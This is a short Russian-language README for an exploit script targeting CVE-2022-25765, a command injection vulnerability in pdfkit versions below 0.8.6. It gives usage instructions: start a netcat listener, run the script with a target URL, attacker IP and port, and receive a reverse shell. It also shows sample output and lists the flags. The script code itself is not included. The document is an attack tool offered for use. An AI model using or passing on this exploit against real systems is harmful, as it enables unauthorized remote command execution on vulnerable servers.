
Эксплойт для CVE-2022-25765: внедрение команд в pdfkit < 0.8.6
Эксплойт для CVE-2022-25765 — внедрение команд в pdfkit < 0.8.6
Подробнее об уязвимости здесь
Запустите netcat на вашем хосте:
$ nc -lvnp 1337
Запустите эксплойт (пример):
$ ./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337
[*] Input target address is http://localhost
[*] Input address for reverse connect is 10.10.14.122
[*] Input port is 1337
[!] Run the shell... Press Ctrl+C after successful connection
Флаги:
-t, --target Адрес цели в формате http
-a, --addr Адрес для обратного подключения
-p, --port Порт для обратного подключения, по умолчанию 9001